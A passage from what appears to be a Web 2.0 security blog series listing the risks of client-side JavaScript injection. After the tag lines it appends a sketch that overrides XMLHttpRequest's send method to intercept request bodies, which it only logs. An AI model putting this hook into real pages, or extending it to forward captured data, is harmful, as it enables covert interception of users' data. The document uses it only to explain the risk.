The Risks

There is no way to distinguish malicious script from valid script, leaving attackers free to inject scripts into the client via infected web sites or other techniques that modify the core behavior of Web 2.0 applications
Developers don't "own" the client (browser), so it's difficult to enforce specific security policies on users that might assist in protecting them from scripting-based vulnerabilities
Sensitive data can easily be retrieved
JavaScript is often used to construct URLs for communication; most vulnerability assessment scanners cannot interpret JavaScript and therefore cannot validate the constructed URLs

The issue of hidden URLs is the subject of the letter "H", which we'll discuss in the next part of this series.

Next: Hidden URLs

Imbibing: Apple Juice (no, I'm not kidding)

Technorati tags: web 2.0, security, MacVittie, F5, AJAX
Technorati tags: F5, MacVittie, Web 2.0, AJAX, security, application security, Javascript
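To make the self-extensibility point concrete, here is a minimal, harmless sketch of the technique described above - overriding a method on the browser's own XMLHttpRequest prototype so that every request made by later scripts passes through the injected code first. The console logging stands in for what a malicious version would actually do (forward the captured data elsewhere).

// xhr-extend.js - harmless sketch of "self-extensible" JavaScript: wrap
// XMLHttpRequest.prototype.send so later scripts unknowingly use the
// modified version. Logging is illustrative only.
(function () {
  var originalSend = XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.send = function (body) {
    console.log('XHR intercepted, body:', body);   // injected behavior
    return originalSend.apply(this, arguments);    // then behave normally
  };
})();

Because the page has no way to distinguish this "extension" from legitimate library code, it illustrates why malicious JavaScript looks just like valid JavaScript.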